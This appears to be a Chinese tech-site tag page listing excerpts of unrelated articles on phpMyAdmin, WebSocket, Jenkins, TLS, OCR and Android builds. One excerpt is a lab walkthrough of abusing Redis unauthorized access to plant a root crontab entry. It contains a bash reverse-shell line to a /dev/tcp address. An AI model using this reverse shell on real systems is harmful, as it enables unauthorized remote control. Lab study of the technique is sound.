草庐IT

利用phpmyadmin拿Webshell

全部标签

利用WebSocket +MQ发送紧急订单消息,并在客户端收到消息的用户的页面自动刷新列表

背景:在原有通知公告的基础上,把通知公共的推送服务修改为其他业务收到紧急订单发送公告到消息队列MQ,然后在js中创建一个socket去监听公告,收到公告后刷新所有在订单页面的用户的页面列表(重点就是用户在收到紧急订单时能及时刷新页面并播报语音),语音播报功能可参考我以前的博文,当前功能只是在原有功能的基础上添加接收到公告时刷新列表(刷新列表完成后就会自动播报语音,这是之前已经完成的功能)maven依赖: org.springframework.boot spring-boot-starter-websocket org.springframework.boot spring-boot-star

基于docker安装phpmyadmin

介绍:phpMyAdmin是一个用PHP编写的软件工具,可以通过web方式控制和操作MySQL数据库。通过phpMyAdmin可以完全对数据库进行操作,例如建立、复制和删除数据等等。如果使用合适的工具,MySQL数据库的管理就会变得相当简单。1.拉取镜像dockerpullphpmyadmin如果由于网络原因导致无法成功拉取,可以先配置dokcer镜像源,也可以在国内网站先下载好镜像的压缩包,然后导入也可以!配置镜像源:Docker中国区官方镜像:https://registry.docker-cn.com网易:http://hub-mirror.c.163.comustc:https://d

【Java】利用SpringBoot搭建WebService服务接口

前言在项目开发过程中经常会碰到对接医疗软件系统的时候对方要求提供WebService形式的接口,本篇文章记载了个人对接项目过程中整合并搭建的WebService形式的接口,希望对您能够有所帮助!一、在pom.xml文件中导入WebService所需的Jar包代码如下:!--WebService-->dependency>groupId>javax.xml.bind/groupId>artifactId>jaxb-api/artifactId>version>2.3.0/version>/dependency>dependency>groupId>com.sun.xml.bind/groupId

利用LightHouse进行合理的页面性能优化,看这一篇就够了!

利用LightHouse进行合理的页面性能优化,看这一篇就够了!前言一.Lighthouse下载1.1相关指标概念1.2Lighthouse优化建议二.跟着Lighthouse进行性能优化2.1Enabletextcompression开启文本压缩2.2Resizeimages重新设定合适大小的图片2.3Eliminaterender-blockingresources消除非关键资源2.4Diagnostics需要进一步调试的复杂诊断三.页面性能优化总结前言Lighthouse是一款由Google开发的开源工具,用于评估Web应用程序的性能和质量。它可以分析Web应用程序的加载速度、渲染性能、

ubuntu利用crontab反弹shell

事情源于自,我利用redis未授权访问漏洞在向ubuntu的/varspool/cron/crontabs目录下创建的任务计划文件去反弹shell时,发现shell并不能反弹到自己的centos2上(1)在ubuntu中进入/var/spool/cron/crontabs/目录cd/var/spool/cron/crontabs/(2)新建一个名为root的任务计划文件touchroot注:root文件的权限必须是600,否则会出现错误影响后面的实验(3)编辑内容*****'/bin/bash-i>&/dev/tcp/192.168.159.201/1234560>&1' (4)在centos

微软宣布 11 月 Patch Tuesday 共修复五个零日漏洞,其中三个已遭黑客利用

IT之家 11月20日消息,微软宣布,今年11月的PatchTuesday总共修复了60多个安全漏洞,其中包括5个零日漏洞,据称有3个已经被黑客利用。IT之家发现,本月的零日漏洞都被分类为“重要”漏洞,其中已被黑客利用的漏洞包括涉及WindowsDWMCoreLibrary的CVE-2023-36033、与WindowsCloudFilesMiniFilterDriver相关的CVE-2023-36036,以及可绕过WindowsSmartScreen安全功能的CVE-2023-36025。WindowsDWMCoreLibrary中,DWM的全名是DesktopWindowManager,其

linux环境下docker中搭建 jenkins 及自定义访问路径,利用nginx反向代理

前言前两天发布了完整的linux服务器上Docker中安装jenkins在实际的开发中,可能我们并不能直接开放8081或者8080端口给jenkins使用,常常是通过nginx方向代理来实现的,这里我们来配置一下。linux环境下docker中搭建jenkins及自定义访问路径,nginx反向代理前言1linux服务器上Docker中安装jenkins2请求路径修改nginx给jenkins项目配置统一的请求前缀(推荐)3删除原来的容器4创建挂载目录修改已经挂载的目录删除容器启动容器5nginx配置完成1linux服务器上Docker中安装jenkins如果你还没有安装可以参考我这篇文章lin

SSL/TLS 介绍以及如何利用openssl生成证书

介绍SSL:SecureSocketLayer安全套接字层。TLS:TransportlayerSecurity传输层安全性,是一种加密协议。发展历程到2020年,SSL以及TLS1.0,TLS1.1已被弃用TLS用在哪里?为什么用TLS?Authentication:通信双方可以确认双方的身份,不被黑客拦截信息伪造身份。Confidentiality:通信的内容经过加密,更加安全,不被授权的用户无法识别内容。Integroty:通讯内容可以查出是否被破坏。TLS是怎么工作的?两阶段:握手阶段,双方通过非对称加密通信,建立连接,传输用于加密数据的对称秘钥通信阶段,双方通过对称秘钥加密数据,互相

Qt利用VCPKG和CMake和OpenCV和Tesseract实现中英文OCR

文章目录1.开发平台2.下载文件2.1下载安装OpenCV库2.2下载安装Tesseract-OCR库2.3下载训练好的语言包3.CMakeLists.txt内容4.Main.cpp4.1中英文混合OCR5.在QtCreator中设置CMake+vcpkg5.1在初始化配置文件里修改5.2在构建配置里修改说明:在Qt工程中CMake使用vcpkg安装的库6.效果截图7.小结Qt利用VCPKG和CMake和OpenCV和Tesseract实现中英文OCR  今天看OpenCV方面的教程,pdf格式的,因为一些强迫症的习惯,喜欢添加一些书签,手动是不太愿意的,自然就想到利用OCR来实现。  想要自

Android aapt 处理器利用率高(而且很慢!)

我在使用Android的aapt工具时遇到问题。我运行两个开发环境。每个都在具有8gbRAM的四核设备上。一个是Windows7,另一个是Ubuntu10.04。两者都运行Eclipse3.7r2和ADT18.0。我用maven构建。我在linux系统上的构建大约需要1分钟,在windows系统上需要4分钟。Windows机器上的性能似乎受cpu限制,因为我可以看到aapt.exe在构建过程中占用整个核心至少2分钟。它在Linux上立即执行。它似乎不是png压缩问题(如记录here),因为这应该在ADT17中修复。遇到此问题的其他人是否找到了解决方法?还有其他人有这个问题吗?